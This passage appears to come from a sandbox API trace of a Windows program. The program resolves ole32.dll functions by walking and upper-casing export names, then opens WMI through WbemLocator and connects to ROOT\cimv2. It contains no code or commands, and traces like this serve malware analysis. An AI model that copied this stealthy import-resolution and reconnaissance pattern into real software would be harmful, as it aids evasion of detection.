lpString2="CoFreeUnusedLibraries" | out: lpString1="CoFreeUnusedLibraries") returned="CoFreeUnusedLibraries" [0051.724] lstrlenA (lpString="COFREEUNUSEDLIBRARIES") returned 21 [0051.724] lstrcpyA (in: lpString1=0xc9e500, lpString2="CoFreeUnusedLibrariesEx" | out: lpString1="CoFreeUnusedLibrariesEx") returned="CoFreeUnusedLibrariesEx" [0051.724] lstrlenA (lpString="COFREEUNUSEDLIBRARIESEX") returned 23 [0051.724] lstrcpyA (in: lpString1=0xc9e500, lpString2="CoGetActivationState" | out: lpString1="CoGetActivationState") returned="CoGetActivationState" [0051.725] lstrlenA (lpString="COGETACTIVATIONSTATE") returned 20 [0051.725] lstrcpyA (in: lpString1=0xc9e500, lpString2="CoGetApartmentID" | out: lpString1="CoGetApartmentID") returned="CoGetApartmentID" [0051.725] lstrlenA (lpString="COGETAPARTMENTID") returned 16 [0051.725] lstrcpyA (in: lpString1=0xc9e500, lpString2="CoGetApartmentType" | out: lpString1="CoGetApartmentType") returned="CoGetApartmentType" [0051.725] lstrlenA (lpString="COGETAPARTMENTTYPE") returned 18 [0051.725] lstrcpyA (in: lpString1=0xc9e500, lpString2="CoGetCallContext" | out: lpString1="CoGetCallContext") returned="CoGetCallContext" [0051.725] lstrlenA (lpString="COGETCALLCONTEXT") returned 16 [0051.725] lstrcpyA (in: lpString1=0xc9e500, lpString2="CoGetCallState" | out: lpString1="CoGetCallState") returned="CoGetCallState" [0051.725] lstrlenA (lpString="COGETCALLSTATE") returned 14 [0051.725] lstrcpyA (in: lpString1=0xc9e500, lpString2="CoGetCallerTID" | out: lpString1="CoGetCallerTID") returned="CoGetCallerTID" [0051.725] lstrlenA (lpString="COGETCALLERTID") returned 14 [0051.725] lstrcpyA (in: lpString1=0xc9e500, lpString2="CoGetCancelObject" | out: lpString1="CoGetCancelObject") returned="CoGetCancelObject" [0051.725] lstrlenA (lpString="COGETCANCELOBJECT") returned 17 [0051.725] lstrcpyA (in: lpString1=0xc9e500, lpString2="CoGetClassObject" | out: lpString1="CoGetClassObject") returned="CoGetClassObject" [0051.725] lstrlenA (lpString="COGETCLASSOBJECT") returned 16 [0051.725] lstrcpyA (in: lpString1=0xc9e500, lpString2="CoGetClassVersion" | out: lpString1="CoGetClassVersion") returned="CoGetClassVersion" [0051.725] lstrlenA (lpString="COGETCLASSVERSION") returned 17 [0051.725] lstrcpyA (in: lpString1=0xc9e500, lpString2="CoGetComCatalog" | out: lpString1="CoGetComCatalog") returned="CoGetComCatalog" [0051.725] lstrlenA (lpString="COGETCOMCATALOG") returned 15 [0051.725] lstrcpyA (in: lpString1=0xc9e500, lpString2="CoGetContextToken" | out: lpString1="CoGetContextToken") returned="CoGetContextToken" [0051.725] lstrlenA (lpString="COGETCONTEXTTOKEN") returned 17 [0051.725] lstrcpyA (in: lpString1=0xc9e500, lpString2="CoGetCurrentLogicalThreadId" | out: lpString1="CoGetCurrentLogicalThreadId") returned="CoGetCurrentLogicalThreadId" [0051.725] lstrlenA (lpString="COGETCURRENTLOGICALTHREADID") returned 27 [0051.725] lstrcpyA (in: lpString1=0xc9e500, lpString2="CoGetCurrentProcess" | out: lpString1="CoGetCurrentProcess") returned="CoGetCurrentProcess" [0051.725] lstrlenA (lpString="COGETCURRENTPROCESS") returned 19 [0051.725] lstrcpyA (in: lpString1=0xc9e500, lpString2="CoGetDefaultContext" | out: lpString1="CoGetDefaultContext") returned="CoGetDefaultContext" [0051.725] lstrlenA (lpString="COGETDEFAULTCONTEXT") returned 19 [0051.725] lstrcpyA (in: lpString1=0xc9e500, lpString2="CoGetInstanceFromFile" | out: lpString1="CoGetInstanceFromFile") returned="CoGetInstanceFromFile" [0051.725] lstrlenA (lpString="COGETINSTANCEFROMFILE") returned 21 [0051.725] lstrcpyA (in: lpString1=0xc9e500, lpString2="CoGetInstanceFromIStorage" | out: lpString1="CoGetInstanceFromIStorage") returned="CoGetInstanceFromIStorage" [0051.725] lstrlenA (lpString="COGETINSTANCEFROMISTORAGE") returned 25 [0051.725] lstrcpyA (in: lpString1=0xc9e500, lpString2="CoGetInterceptor" | out: lpString1="CoGetInterceptor") returned="CoGetInterceptor" [0051.725] lstrlenA (lpString="COGETINTERCEPTOR") returned 16 [0051.725] lstrcpyA (in: lpString1=0xc9e500, lpString2="CoGetInterceptorFromTypeInfo" | out: lpString1="CoGetInterceptorFromTypeInfo") returned="CoGetInterceptorFromTypeInfo" [0051.725] lstrlenA (lpString="COGETINTERCEPTORFROMTYPEINFO") returned 28 [0051.725] lstrcpyA (in: lpString1=0xc9e500, lpString2="CoGetInterfaceAndReleaseStream" | out: lpString1="CoGetInterfaceAndReleaseStream") returned="CoGetInterfaceAndReleaseStream" [0051.726] lstrlenA (lpString="COGETINTERFACEANDRELEASESTREAM") returned 30 [0051.726] lstrcpyA (in: lpString1=0xc9e500, lpString2="CoGetMalloc" | out: lpString1="CoGetMalloc") returned="CoGetMalloc" [0051.726] lstrlenA (lpString="COGETMALLOC") returned 11 [0051.726] lstrcpyA (in: lpString1=0xc9e500, lpString2="CoGetMarshalSizeMax" | out: lpString1="CoGetMarshalSizeMax") returned="CoGetMarshalSizeMax" [0051.726] lstrlenA (lpString="COGETMARSHALSIZEMAX") returned 19 [0051.726] lstrcpyA (in: lpString1=0xc9e500, lpString2="CoGetModuleType" | out: lpString1="CoGetModuleType") returned="CoGetModuleType" [0051.726] lstrlenA (lpString="COGETMODULETYPE") returned 15 [0051.726] lstrcpyA (in: lpString1=0xc9e500, lpString2="CoGetObject" | out: lpString1="CoGetObject") returned="CoGetObject" [0051.726] lstrlenA (lpString="COGETOBJECT") returned 11 [0051.726] lstrcpyA (in: lpString1=0xc9e500, lpString2="CoGetObjectContext" | out: lpString1="CoGetObjectContext") returned="CoGetObjectContext" [0051.726] lstrlenA (lpString="COGETOBJECTCONTEXT") returned 18 [0051.726] lstrcpyA (in: lpString1=0xc9e500, lpString2="CoGetPSClsid" | out: lpString1="CoGetPSClsid") returned="CoGetPSClsid" [0051.726] lstrlenA (lpString="COGETPSCLSID") returned 12 [0051.726] lstrcpyA (in: lpString1=0xc9e500, lpString2="CoGetProcessIdentifier" | out: lpString1="CoGetProcessIdentifier") returned="CoGetProcessIdentifier" [0051.726] lstrlenA (lpString="COGETPROCESSIDENTIFIER") returned 22 [0051.726] lstrcpyA (in: lpString1=0xc9e500, lpString2="CoGetStandardMarshal" | out: lpString1="CoGetStandardMarshal") returned="CoGetStandardMarshal" [0051.726] lstrlenA (lpString="COGETSTANDARDMARSHAL") returned 20 [0051.726] lstrcpyA (in: lpString1=0xc9e500, lpString2="CoGetStdMarshalEx" | out: lpString1="CoGetStdMarshalEx") returned="CoGetStdMarshalEx" [0051.726] lstrlenA (lpString="COGETSTDMARSHALEX") returned 17 [0051.726] lstrcpyA (in: lpString1=0xc9e500, lpString2="CoGetSystemSecurityPermissions" | out: lpString1="CoGetSystemSecurityPermissions") returned="CoGetSystemSecurityPermissions" [0051.726] lstrlenA (lpString="COGETSYSTEMSECURITYPERMISSIONS") returned 30 [0051.726] lstrcpyA (in: lpString1=0xc9e500, lpString2="CoGetTreatAsClass" | out: lpString1="CoGetTreatAsClass") returned="CoGetTreatAsClass" [0051.727] lstrlenA (lpString="COGETTREATASCLASS") returned 17 [0051.727] lstrcpyA (in: lpString1=0xc9e500, lpString2="CoImpersonateClient" | out: lpString1="CoImpersonateClient") returned="CoImpersonateClient" [0051.727] lstrlenA (lpString="COIMPERSONATECLIENT") returned 19 [0051.727] lstrcpyA (in: lpString1=0xc9e500, lpString2="CoInitialize" | out: lpString1="CoInitialize") returned="CoInitialize" [0051.727] lstrlenA (lpString="COINITIALIZE") returned 12 [0051.727] lstrcpyA (in: lpString1=0xc9e500, lpString2="CoInitializeEx" | out: lpString1="CoInitializeEx") returned="CoInitializeEx" [0051.727] lstrlenA (lpString="COINITIALIZEEX") returned 14 [0051.727] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x1 [0051.727] lstrlenA (lpString="ole32.dll") returned 9 [0051.727] GetModuleHandleA (lpModuleName="ole32.dll") returned 0x755e0000 [0051.727] lstrcpyA (in: lpString1=0xc9e4f4, lpString2="BindMoniker" | out: lpString1="BindMoniker") returned="BindMoniker" [0051.727] lstrlenA (lpString="BINDMONIKER") returned 11 [0051.727] lstrcpyA (in: lpString1=0xc9e4f4, lpString2="CLIPFORMAT_UserFree" | out: lpString1="CLIPFORMAT_UserFree") returned="CLIPFORMAT_UserFree" [0051.727] lstrlenA (lpString="CLIPFORMAT_USERFREE") returned 19 [0051.727] lstrcpyA (in: lpString1=0xc9e4f4, lpString2="CLIPFORMAT_UserMarshal" | out: lpString1="CLIPFORMAT_UserMarshal") returned="CLIPFORMAT_UserMarshal" [0051.727] lstrlenA (lpString="CLIPFORMAT_USERMARSHAL") returned 22 [0051.727] lstrcpyA (in: lpString1=0xc9e4f4, lpString2="CLIPFORMAT_UserSize" | out: lpString1="CLIPFORMAT_UserSize") returned="CLIPFORMAT_UserSize" [0051.727] lstrlenA (lpString="CLIPFORMAT_USERSIZE") returned 19 [0051.727] lstrcpyA (in: lpString1=0xc9e4f4, lpString2="CLIPFORMAT_UserUnmarshal" | out: lpString1="CLIPFORMAT_UserUnmarshal") returned="CLIPFORMAT_UserUnmarshal" [0051.727] lstrlenA (lpString="CLIPFORMAT_USERUNMARSHAL") returned 24 [0051.727] lstrcpyA (in: lpString1=0xc9e4f4, lpString2="CLSIDFromOle1Class" | out: lpString1="CLSIDFromOle1Class") returned="CLSIDFromOle1Class" [0051.727] lstrlenA (lpString="CLSIDFROMOLE1CLASS") returned 18 [0051.727] lstrcpyA (in: lpString1=0xc9e4f4, lpString2="CLSIDFromProgID" | out: lpString1="CLSIDFromProgID") returned="CLSIDFromProgID" [0051.727] lstrlenA (lpString="CLSIDFROMPROGID") returned 15 [0051.727] lstrcpyA (in: lpString1=0xc9e4f4, lpString2="CLSIDFromProgIDEx" | out: lpString1="CLSIDFromProgIDEx") returned="CLSIDFromProgIDEx" [0051.727] lstrlenA (lpString="CLSIDFROMPROGIDEX") returned 17 [0051.727] lstrcpyA (in: lpString1=0xc9e4f4, lpString2="CLSIDFromString" | out: lpString1="CLSIDFromString") returned="CLSIDFromString" [0051.727] lstrlenA (lpString="CLSIDFROMSTRING") returned 15 [0051.727] lstrcpyA (in: lpString1=0xc9e4f4, lpString2="CoAddRefServerProcess" | out: lpString1="CoAddRefServerProcess") returned="CoAddRefServerProcess" [0051.727] lstrlenA (lpString="COADDREFSERVERPROCESS") returned 21 [0051.728] lstrcpyA (in: lpString1=0xc9e4f4, lpString2="CoAllowSetForegroundWindow" | out: lpString1="CoAllowSetForegroundWindow") returned="CoAllowSetForegroundWindow" [0051.728] lstrlenA (lpString="COALLOWSETFOREGROUNDWINDOW") returned 26 [0051.728] lstrcpyA (in: lpString1=0xc9e4f4, lpString2="CoBuildVersion" | out: lpString1="CoBuildVersion") returned="CoBuildVersion" [0051.728] lstrlenA (lpString="COBUILDVERSION") returned 14 [0051.728] lstrcpyA (in: lpString1=0xc9e4f4, lpString2="CoCancelCall" | out: lpString1="CoCancelCall") returned="CoCancelCall" [0051.728] lstrlenA (lpString="COCANCELCALL") returned 12 [0051.728] lstrcpyA (in: lpString1=0xc9e4f4, lpString2="CoCopyProxy" | out: lpString1="CoCopyProxy") returned="CoCopyProxy" [0051.728] lstrlenA (lpString="COCOPYPROXY") returned 11 [0051.728] lstrcpyA (in: lpString1=0xc9e4f4, lpString2="CoCreateFreeThreadedMarshaler" | out: lpString1="CoCreateFreeThreadedMarshaler") returned="CoCreateFreeThreadedMarshaler" [0051.728] lstrlenA (lpString="COCREATEFREETHREADEDMARSHALER") returned 29 [0051.728] lstrcpyA (in: lpString1=0xc9e4f4, lpString2="CoCreateGuid" | out: lpString1="CoCreateGuid") returned="CoCreateGuid" [0051.728] lstrlenA (lpString="COCREATEGUID") returned 12 [0051.728] lstrcpyA (in: lpString1=0xc9e4f4, lpString2="CoCreateInstance" | out: lpString1="CoCreateInstance") returned="CoCreateInstance" [0051.728] lstrlenA (lpString="COCREATEINSTANCE") returned 16 [0051.728] CoCreateInstance (in: rclsid=0xb6d64*(Data1=0x674b6698, Data2=0xee92, Data3=0x11d0, Data4=([0]=0xad, [1]=0x71, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd8, [6]=0xfd, [7]=0xff)), pUnkOuter=0x0, dwClsContext=0x1, riid=0xb6d54*(Data1=0x44aca674, Data2=0xe8fc, Data3=0x11d0, Data4=([0]=0xa0, [1]=0x7c, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0x88, [7]=0x20)), ppv=0xc9f198 | out: ppv=0xc9f198*=0x31cff8) returned 0x0 [0051.729] WbemContext:IWbemContext:SetValue (This=0x31cff8, wszName="__ProviderArchitecture", lFlags=0, pValue=0xc9f1a8*(varType=0x3, wReserved1=0x5d, wReserved2=0x70d8, wReserved3=0x5d, varVal1=0x40, varVal2=0x5d7480)) returned 0x0 [0051.729] lstrlenA (lpString="ole32.dll") returned 9 [0051.729] GetModuleHandleA (lpModuleName="ole32.dll") returned 0x755e0000 [0051.729] lstrcpyA (in: lpString1=0xc9e4f4, lpString2="BindMoniker" | out: lpString1="BindMoniker") returned="BindMoniker" [0051.729] lstrlenA (lpString="BINDMONIKER") returned 11 [0051.729] lstrcpyA (in: lpString1=0xc9e4f4, lpString2="CLIPFORMAT_UserFree" | out: lpString1="CLIPFORMAT_UserFree") returned="CLIPFORMAT_UserFree" [0051.729] lstrlenA (lpString="CLIPFORMAT_USERFREE") returned 19 [0051.729] lstrcpyA (in: lpString1=0xc9e4f4, lpString2="CLIPFORMAT_UserMarshal" | out: lpString1="CLIPFORMAT_UserMarshal") returned="CLIPFORMAT_UserMarshal" [0051.729] lstrlenA (lpString="CLIPFORMAT_USERMARSHAL") returned 22 [0051.729] lstrcpyA (in: lpString1=0xc9e4f4, lpString2="CLIPFORMAT_UserSize" | out: lpString1="CLIPFORMAT_UserSize") returned="CLIPFORMAT_UserSize" [0051.729] lstrlenA (lpString="CLIPFORMAT_USERSIZE") returned 19 [0051.729] lstrcpyA (in: lpString1=0xc9e4f4, lpString2="CLIPFORMAT_UserUnmarshal" | out: lpString1="CLIPFORMAT_UserUnmarshal") returned="CLIPFORMAT_UserUnmarshal" [0051.729] lstrlenA (lpString="CLIPFORMAT_USERUNMARSHAL") returned 24 [0051.729] lstrcpyA (in: lpString1=0xc9e4f4, lpString2="CLSIDFromOle1Class" | out: lpString1="CLSIDFromOle1Class") returned="CLSIDFromOle1Class" [0051.729] lstrlenA (lpString="CLSIDFROMOLE1CLASS") returned 18 [0051.729] lstrcpyA (in: lpString1=0xc9e4f4, lpString2="CLSIDFromProgID" | out: lpString1="CLSIDFromProgID") returned="CLSIDFromProgID" [0051.729] lstrlenA (lpString="CLSIDFROMPROGID") returned 15 [0051.729] lstrcpyA (in: lpString1=0xc9e4f4, lpString2="CLSIDFromProgIDEx" | out: lpString1="CLSIDFromProgIDEx") returned="CLSIDFromProgIDEx" [0051.729] lstrlenA (lpString="CLSIDFROMPROGIDEX") returned 17 [0051.729] lstrcpyA (in: lpString1=0xc9e4f4, lpString2="CLSIDFromString" | out: lpString1="CLSIDFromString") returned="CLSIDFromString" [0051.729] lstrlenA (lpString="CLSIDFROMSTRING") returned 15 [0051.730] lstrcpyA (in: lpString1=0xc9e4f4, lpString2="CoAddRefServerProcess" | out: lpString1="CoAddRefServerProcess") returned="CoAddRefServerProcess" [0051.730] lstrlenA (lpString="COADDREFSERVERPROCESS") returned 21 [0051.730] lstrcpyA (in: lpString1=0xc9e4f4, lpString2="CoAllowSetForegroundWindow" | out: lpString1="CoAllowSetForegroundWindow") returned="CoAllowSetForegroundWindow" [0051.730] lstrlenA (lpString="COALLOWSETFOREGROUNDWINDOW") returned 26 [0051.730] lstrcpyA (in: lpString1=0xc9e4f4, lpString2="CoBuildVersion" | out: lpString1="CoBuildVersion") returned="CoBuildVersion" [0051.730] lstrlenA (lpString="COBUILDVERSION") returned 14 [0051.730] lstrcpyA (in: lpString1=0xc9e4f4, lpString2="CoCancelCall" | out: lpString1="CoCancelCall") returned="CoCancelCall" [0051.730] lstrlenA (lpString="COCANCELCALL") returned 12 [0051.730] lstrcpyA (in: lpString1=0xc9e4f4, lpString2="CoCopyProxy" | out: lpString1="CoCopyProxy") returned="CoCopyProxy" [0051.730] lstrlenA (lpString="COCOPYPROXY") returned 11 [0051.730] lstrcpyA (in: lpString1=0xc9e4f4, lpString2="CoCreateFreeThreadedMarshaler" | out: lpString1="CoCreateFreeThreadedMarshaler") returned="CoCreateFreeThreadedMarshaler" [0051.730] lstrlenA (lpString="COCREATEFREETHREADEDMARSHALER") returned 29 [0051.730] lstrcpyA (in: lpString1=0xc9e4f4, lpString2="CoCreateGuid" | out: lpString1="CoCreateGuid") returned="CoCreateGuid" [0051.730] lstrlenA (lpString="COCREATEGUID") returned 12 [0051.730] lstrcpyA (in: lpString1=0xc9e4f4, lpString2="CoCreateInstance" | out: lpString1="CoCreateInstance") returned="CoCreateInstance" [0051.730] lstrlenA (lpString="COCREATEINSTANCE") returned 16 [0051.730] CoCreateInstance (in: rclsid=0xb6d74*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x4401, riid=0xb6d84*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0xc9f1a4 | out: ppv=0xc9f1a4*=0x310880) returned 0x0 [0051.732] WbemLocator:IWbemLocator:ConnectServer (in: This=0x310880, strNetworkResource="ROOT\\cimv2", strUser=0x0, strPassword=0x0, strLocale=0x0, lSecurityFlags=0, strAuthority=0x0, pCtx=0x31cff8, ppNamespace=0xc9f190 | out: ppNamespace=0xc9f190*=0x31d0e4) returned 0x0 [0051.749] lstrlenA (lpString="ole32.dll") returned 9 [0051.749] GetModuleHandleA (lpModuleName="ole32.dll") returned 0x755e0000 [0051.749] lstrcpyA (in: lpString1=0xc9e4e8, lpString2="BindMoniker" | out: lpString1="BindMoniker") returned="BindMoniker" [0051.749] lstrlenA (lpString="BINDMONIKER") returned 11 [0051.749] lstrcpyA (in: lpString1=0xc9e4e8, lpString2="CLIPFORMAT_UserFree" | out: lpString1="CLIPFORMAT_UserFree") returned="CLIPFORMAT_UserFree" [0051.749] lstrlenA (lpString="CLIPFORMAT_USERFREE") returned 19 [0051.749] lstrcpyA (in: lpString1=0xc9e4e8, lpString2="CLIPFORMAT_UserMarshal" | out: lpString1="CLIPFORMAT_UserMarshal") returned="CLIPFORMAT_UserMarshal" [0051.749] lstrlenA (lpString="CLIPFORMAT_USERMARSHAL") returned 22 [0051.749] lstrcpyA (in: lpString1=0xc9e4e8, lpString2="CLIPFORMAT_UserSize" | out: lpString1="CLIPFORMAT_UserSize") returned="CLIPFORMAT_UserSize" [0051.749] lstrlenA (lpString="CLIPFORMAT_USERSIZE") returned 19 [0051.750] lstrcpyA (in: lpString1=0xc9e4e8, lpString2="CLIPFORMAT_UserUnmarshal" | out: lpString1="CLIPFORMAT_UserUnmarshal") returned="CLIPFORMAT_UserUnmarshal" [0051.750] lstrlenA (lpString="CLIPFORMAT_USERUNMARSHAL") returned 24 [0051.750] lstrcpyA (in: lpString1=0xc9e4e8, lpString2="CLSIDFromOle1Class" | out: lpString1="CLSIDFromOle1Class") returned="CLSIDFromOle1Class" [0051.750] lstrlenA (lpString="CLSIDFROMOLE1CLASS") returned 18 [0051.750] lstrcpyA (in: lpString1=0xc9e4e8, lpString2="CLSIDFromProgID" | out: lpString1="CLSIDFromProgID") returned="CLSIDFromProgID" [0051.750] lstrlenA (lpString="CLSIDFROMPROGID") returned 15 [0051.750] lstrcpyA (in: lpString1=0xc9e4e8, lpString2="CLSIDFromProgIDEx" | out: lpString1="CLSIDFromProgIDEx") returned="CLSIDFromProgIDEx" [0051.750] lstrlenA (lpString="CLSIDFROMPROGIDEX") returned 17 [0051.750] lstrcpyA (in: lpString1=0xc9e4e8, lpString2="CLSIDFromString" | out: lpString1="CLSIDFromString") returned="CLSIDFromString" [0051.750] lstrlenA (lpString="CLSIDFROMSTRING") returned 15 [0051.750] lstrcpyA (in: lpString1=0xc9e4e8, lpString2="CoAddRefServerProcess" | out: lpString1="CoAddRefServerProcess") returned="CoAddRefServerProcess" [0051.750] lstrlenA (lpString="COADDREFSERVERPROCESS") returned 21 [0051.750] lstrcpyA (in: lpString1=0xc9e4e8, lpString2="CoAllowSetForegroundWindow" | out: lpString1="CoAllowSetForegroundWindow") returned="CoAllowSetForegroundWindow" [0051.750] lstrlenA (lpString="COALLOWSETFOREGROUNDWINDOW") returned 26 [0051.750] lstrcpyA (in: lpString1=0xc9e4e8, lpString2="CoBuildVersion" | out: lpString1="CoBuildVersion") returned="CoBuildVersion" [0051.750] lstrlenA (lpString="COBUILDVERSION") returned 14 [0051.750] lstrcpyA (in: lpString1=0xc9e4e8, lpString2="CoCancelCall" | out: lpString1="CoCancelCall") returned="CoCancelCall" [0051.750] lstrlenA (lpString="COCANCELCALL") returned 12 [0051.750] lstrcpyA (in: lpString1=0xc9e4e8, lpString2="CoCopyProxy" | out: lpString1="CoCopyProxy") returned="CoCopyProxy" [0051.750] lstrlenA (lpString="COCOPYPROXY") returned 11 [0051.750] lstrcpyA (in: lpString1=0xc9e4e8, lpString2="CoCreateFreeThreadedMarshaler" | out: lpString1="CoCreateFreeThreadedMarshaler") returned="CoCreateFreeThreadedMarshaler" [0051.750] lstrlenA (lpString="COCREATEFREETHREADEDMARSHALER") returned 29 [0051.750] lstrcpyA (in: lpString1=0xc9e4e8, lpString2="CoCreateGuid" | out: lpString1="CoCreateGuid") returned="CoCreateGuid" [0051.750] lstrlenA (lpString="COCREATEGUID") returned 12 [0051.750] lstrcpyA (in: lpString1=0xc9e4e8, lpString2="CoCreateInstance" | out: lpString1="CoCreateInstance") returned="CoCreateInstance" [0051.750] lstrlenA (lpString="COCREATEINSTANCE") returned 16 [0051.750] lstrcpyA (in: lpString1=0xc9e4e8, lpString2="CoCreateInstanceEx" | out: lpString1="CoCreateInstanceEx") returned="CoCreateInstanceEx" [0051.750] lstrlenA (lpString="COCREATEINSTANCEEX") returned 18 [0051.750] lstrcpyA (in: lpString1=0xc9e4e8, lpString2="CoCreateObjectInContext" | out: lpString1="CoCreateObjectInContext") returned="CoCreateObjectInContext" [0051.750] lstrlenA (lpString="COCREATEOBJECTINCONTEXT") returned 23 [0051.750] lstrcpyA (in: lpString1=0xc9e4e8, lpString2="CoDeactivateObject" | out: lpString1="CoDeactivateObject") returned="CoDeactivateObject" [0051.750] lstrlenA (lpString="CODEACTIVATEOBJECT") returned 18 [0051.750] lstrcpyA (in: lpString1=0xc9e4e8, lpString2="CoDisableCallCancellation" | out: lpString1="CoDisableCallCancellation") returned="CoDisableCallCancellation" [0051.750] lstrlenA (lpString="CODISABLECALLCANCELLATION") returned 25 [0051.750] lstrcpyA (in: lpString1=0xc9e4e8, lpString2="CoDisconnectContext" | out: lpString1="CoDisconnectContext") returned="CoDisconnectContext" [0051.750] lstrlenA (lpString="CODISCONNECTCONTEXT") returned 19 [0051.750] lstrcpyA (in: lpString1=0xc9e4e8, lpString2="CoDisconnectObject" | out: lpString1="CoDisconnectObject") returned="CoDisconnectObject" [0051.750] lstrlenA (lpString="CODISCONNECTOBJECT") returned 18 [0051.751] lstrcpyA (in: lpString1=0xc9e4e8, lpString2="CoDosDateTimeToFileTime" | out: lpString1="CoDosDateTimeToFileTime") returned="CoDosDateTimeToFileTime" [0051.751] lstrlenA (lpString="CODOSDATETIMETOFILETIME") returned 23 [0051.751] lstrcpyA (in: lpString1=0xc9e4e8, lpString2="CoEnableCallCancellation" | out: lpString1="CoEnableCallCancellation") returned="CoEnableCallCancellation" [0051.751] lstrlenA (lpString="COENABLECALLCANCELLATION") returned 24 [0051.751] lstrcpyA (in: lpString1=0xc9e4e8, lpString2="CoFileTimeNow" | out: lpString1="CoFileTimeNow") returned="CoFileTimeNow" [0051.751] lstrlenA (lpString="COFILETIMENOW") returned 13 [0051.751] lstrcpyA (in: lpString1=0xc9e4e8, lpString2="CoFileTimeToDosDateTime" | out: lpString1="CoFileTimeToDosDateTime") returned="CoFileTimeToDosDateTime" [0051.751] lstrlenA (lpString="COFILETIMETODOSDATETIME") returned 23 [0051.751] lstrcpyA (in: lpString1=0xc9e4e8, lpString2="CoFreeAllLibraries" | out: lpString1="CoFreeAllLibraries") returned="CoFreeAllLibraries" [0051.751] lstrlenA (lpString="COFREEALLLIBRARIES") returned 18 [0051.751] lstrcpyA (in: lpString1=0xc9e4e8, lpString2="CoFreeLibrary" | out: lpString1="CoFreeLibrary") returned="CoFreeLibrary" [0051.751] lstrlenA (lpString="COFREELIBRARY") returned 13 [0051.751] lstrcpyA (in: lpString1=0xc9e4e8, lpString2="CoFreeUnusedLibraries" | out: lpString1="CoFreeUnusedLibraries") returned="CoFreeUnusedLibraries" [0051.751] lstrlenA (lpString="COFREEUNUSEDLIBRARIES") returned 21 [0051.751] lstrcpyA (in: lpString1=0xc9e4e8, lpString2="CoFreeUnusedLibrariesEx" | out: lpString1="CoFreeUnusedLibrariesEx") returned="CoFreeUnusedLibrariesEx" [0051.751] lstrlenA (lpString="COFREEUNUSEDLIBRARIESEX") returned 23 [0051.751] lstrcpyA (in: lpString1=0xc9e4e8, lpString2="CoGetActivationState" | out: lpString1="CoGetActivationState") returned="CoGetActivationState" [0051.751] lstrlenA (lpString="COGETACTIVATIONSTATE") returned 20 [0051.751] lstrcpyA (in: lpString1=0xc9e4e8, lpString2="CoGetApartmentID" | out: lpString1="CoGetApartmentID") returned="CoGetApartmentID" [0051.751] lstrlenA (lpString="COGETAPARTMENTID") returned 16 [0051.751] lstrcpyA (in: lpString1=0xc9e4e8, lpString2="CoGetApartmentType" | out: lpString1="CoGetApartmentType") returned="CoGetApartmentType" [0051.751] lstrlenA (lpString="COGETAPARTMENTTYPE") returned 18 [0051.751] lstrcpyA (in: lpString1=0xc9e4e8, lpString2="CoGetCallContext" | out: lpString1="CoGetCallContext") returned="CoGetCallContext" [0051.751] lstrlenA (lpString="COGETCALLCONTEXT") returned 16 [0051.751] lstrcpyA (in: lpString1=0xc9e4e8, lpString2="CoGetCallState" | out: lpString1="CoGetCallState") returned="CoGetCallState" [0051.751] lstrlenA (lpString="COGETCALLSTATE") returned 14 [0051.751] lstrcpyA (in: lpString1=0xc9e4e8, lpString2="CoGetCallerTID" | out: lpString1="CoGetCallerTID") returned="CoGetCallerTID" [0051.751] lstrlenA (lpString="COGETCALLERTID") returned 14 [0051.751] lstrcpyA (in: lpString1=0xc9e4e8, lpString2="CoGetCancelObject" | out: lpString1="CoGetCancelObject") returned="CoGetCancelObject" [0051.751] lstrlenA (lpString="COGETCANCELOBJECT") returned 17 [0051.751] lstrcpyA (in: lpString1=0xc9e4e8, lpString2="CoGetClassObject" | out: lpString1="CoGetClassObject") returned="CoGetClassObject" [0051.751] lstrlenA (lpString="COGETCLASSOBJECT") returned 16 [0051.751] lstrcpyA (in: lpString1=0xc9e4e8, lpString2="CoGetClassVersion" | out: lpString1="CoGetClassVersion") returned="CoGetClassVersion" [0051.751] lstrlenA (lpString="COGETCLASSVERSION") returned 17 [0051.751] lstrcpyA (in: lpString1=0xc9e4e8, lpString2="CoGetComCatalog" | out: lpString1="CoGetComCatalog") returned="CoGetComCatalog" [0051.751] lstrlenA (lpString="COGETCOMCATALOG") returned 15 [0051.751] lstrcpyA (in: lpString1=0xc9e4e8, lpString2="CoGetContextToken" | out: lpString1="CoGetContextToken") returned="CoGetContextToken" [0051.751] lstrlenA (lpString="COGETCONTEXTTOKEN") returned 17 [0051.751] lstrcpyA (in: lpString1=0xc9e4e8, lpString2="CoGetCurrentLogicalThreadId" | out: lpString1="CoGetCurrentLogicalThreadId") returned="CoGetCurrentLogicalThreadId" [0051.751] lstrlenA (lpString="COGETCURRENTLOGICALTHREADID") returned 27 [0051.752] lstrcpyA (in: lpString1=0xc9e4e8, lpString2="CoGetCurrentProcess" | out: lpString1="CoGetCurrentProcess") returned="CoGetCurrentProcess" [0051.752] lstrlenA (lpString="COGETCURRENTPROCESS") returned 19 [0051.752] lstrcpyA (in: lpString1=0xc9e4e8, lpString2="CoGetDefaultContext" | out: lpString1="CoGetDefaultContext") returned="CoGetDefaultContext" [0051.752] lstrlenA (lpString="COGETDEFAULTCONTEXT") returned 19 [0051.752] lstrcpyA (in: lpString1=0xc9e4e8, lpString2="CoGetInstanceFromFile" | out: lpString1="CoGetInstanceFromFile") returned="CoGetInstanceFromFile" [0051.752] lstrlenA (lpString="COGETINSTANCEFROMFILE") returned 21 [0051.752] lstrcpyA (in: lpString1=0xc9e4e8, lpString2="CoGetInstanceFromIStorage" | out: lpString1="CoGetInstanceFromIStorage") returned="CoGetInstanceFromIStorage" [0051.752] lstrlenA (lpString="COGETINSTANCEFROMISTORAGE") returned 25 [0051.752] lstrcpyA (in: lpString1=0xc9e4e8, lpString2="CoGetInterceptor" | out: lpString1="CoGetInterceptor") returned="CoGetInterceptor" [0051.752] lstrlenA (lpString="COGETINTERCEPTOR") returned 16 [0051.752] lstrcpyA (in: lpString1=0xc9e4e8, lpString2="CoGetInterceptorFromTypeInfo" | out: lpString1="CoGetInterceptorFromTypeInfo") returned="CoGetInterceptorFromTypeInfo" [0051.752] lstrlenA 